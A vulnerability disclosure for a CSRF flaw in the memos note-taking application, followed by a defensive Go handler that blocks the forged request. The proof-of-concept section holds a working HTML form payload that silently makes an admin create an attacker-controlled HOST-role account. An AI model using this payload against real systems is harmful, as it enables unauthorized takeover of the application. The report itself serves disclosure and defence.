CSRF allows an attacker to make an admin add a HOST user, leading to takeover of the memos application in usememos/memos
Valid
Reported on Dec 29th 2022
Description
This vulnerability allows an attacker to trick a logged-in admin into submitting a forged request that creates a new user with any role, including HOST.
Proof of Concept
- The attacker creates a malicious page containing the CSRF payload and hosts it on an attacker-controlled server, e.g. httpx://attacker.server/csrf.html
- The attacker sends this link to a memos admin
- The admin opens the link, the page submits the forged request, and a user with the HOST role under the attacker's control is created
PoC video: https://drive.google.com/file/d/1vUobMDZ3rzdbj-UfLU6-qiZD9ILqXDzK/view?usp=sharing
PoC payload:
CSRF.html:
<html>
<!-- CSRF PoC to add HOST user into memos -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.memos.server/api/user" method="POST" enctype="text/plain">
<!-- The name attribute is single-quoted so the double quotes of the JSON object survive as-is -->
<input type="hidden" name='{"username":"attackerhere","password":"123456","role":"HOST"}' value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
If an admin triggers this attack, the attacker obtains a HOST-role account and can take over the memos application.
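As an added defender-side example (not memos' own code), the hypothetical Go handler below shows why the forged request above fails against a hardened endpoint: a cross-site HTML form can only submit urlencoded, multipart or text/plain bodies and cannot present an Origin the server trusts, so requiring Content-Type application/json and an allow-listed Origin rejects the PoC with 403 while a legitimate same-origin JSON request gets 201. Go is used because the memos backend is written in Go; allowedOrigins, createUserHandler and simulate are constructed for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed allow-list of the origins the application is served from.
var allowedOrigins = map[string]bool{"http://demo.memos.server": true}

// csrfSafe reports whether r could have come from a cross-site HTML form. A form can only
// submit urlencoded, multipart or text/plain bodies (the PoC uses text/plain), so requiring
// application/json alone stops this attack; the Origin check is defence in depth.
func csrfSafe(r *http.Request) (bool, string) {
	mt := strings.ToLower(strings.TrimSpace(strings.Split(r.Header.Get("Content-Type"), ";")[0]))
	if mt != "application/json" {
		return false, "content type must be application/json"
	}
	if o := r.Header.Get("Origin"); o != "" && !allowedOrigins[o] {
		return false, "origin not allowed"
	}
	return true, ""
}

// createUserHandler is a hypothetical hardened stand-in for the POST /api/user handler.
func createUserHandler(w http.ResponseWriter, r *http.Request) {
	if ok, why := csrfSafe(r); !ok {
		http.Error(w, why, http.StatusForbidden)
		return
	}
	var req struct{ Username, Password, Role string }
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
		http.Error(w, "malformed JSON", http.StatusBadRequest)
		return
	}
	w.WriteHeader(http.StatusCreated) // role authorization and the insert would follow here
}

// simulate drives the handler with a constructed request and returns the response status.
func simulate(contentType, origin, body string) int {
	r := httptest.NewRequest("POST", "/api/user", strings.NewReader(body))
	r.Header.Set("Content-Type", contentType)
	r.Header.Set("Origin", origin)
	rec := httptest.NewRecorder()
	createUserHandler(rec, r)
	return rec.Code
}
func main() {
	fmt.Println(simulate("text/plain", "http://attacker.server", `{"username":"attackerhere","password":"123456","role":"HOST"}=`))
	fmt.Println(simulate("application/json", "http://demo.memos.server", `{"username":"alice","password":"s3cret","role":"USER"}`))
}
```

The first call reproduces what the PoC form sends (text/plain body from the attacker's origin) and prints 403; the second is a legitimate same-origin JSON request and prints 201.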